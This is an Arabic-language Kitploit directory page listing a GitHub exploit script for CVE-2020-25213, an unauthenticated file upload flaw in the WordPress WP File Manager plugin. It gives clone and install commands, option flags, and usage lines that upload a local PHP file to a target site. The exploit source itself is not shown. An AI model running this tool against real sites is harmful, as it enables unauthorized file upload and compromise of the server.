Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
wp-file-manager-CVE-2020-25213 — https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8 | Kitploit
أدوات/GitHubGitHub/mansoorr123/wp-file-manager-cve-2020-25213
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmansoorr123/wp-file-manager-cve-2020-25213

wp-file-manager-CVE-2020-25213

https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
5826منذ 5 سنواتتمت المراجعة من قبل Kitploit

استغلال WP-file-manager CVE-2020-25213

إضافة WP-file-manager الخاصة بـ wordpress (الإصدارات <6.9) معرّضة لرفع ملفات عشوائي دون مصادقة، مما يؤدي إلى اختراق كامل للنظام.

لمزيد من التفاصيل، راجع مقالتي المنشورة هنا

إخلاء مسؤولية

لم أكتشف هذه الثغرة ولا أنسب لنفسي أي فضل في هذا الـ CVE. لقد أنشأت الاستغلال فقط بعد تحليل الوصف المتاح في مدونات متعددة مثل wordfence وseravo بهدف تمكين القراء من فهم كيفية إنشاء POC بمجرد تحليل وصف الثغرة.
لست مسؤولاً عن أي ضرر يلحق بمؤسسة نتيجة استخدام هذا الاستغلال، وأنصح القراء بعدم استغلال هذه الثغرة دون موافقة خطية من المؤسسة، لأن ذلك قد يعرّض المؤسسة لهجمات من قراصنة آخرين.

التثبيت

git clone https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213.git
chmod +x wp-file-manager-CVE-2020-25213/wp-file-manager-exploit.sh

الخيارات

root@kitploit:~
-u|--wp_url				Wordpress target url  
-f|--upload_file			Absolute location of local file to upload on the target.  
-k|--check				Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.  
-v|--verbose				Also prints curl command which is going to be executed  
-h|--help				Print Help menu  

الاستخدام

./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose

لقطات

لقطة 1 لقطة 2 لقطة 3

المصادر

  1. https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/
  2. https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/
تنزيل الأداة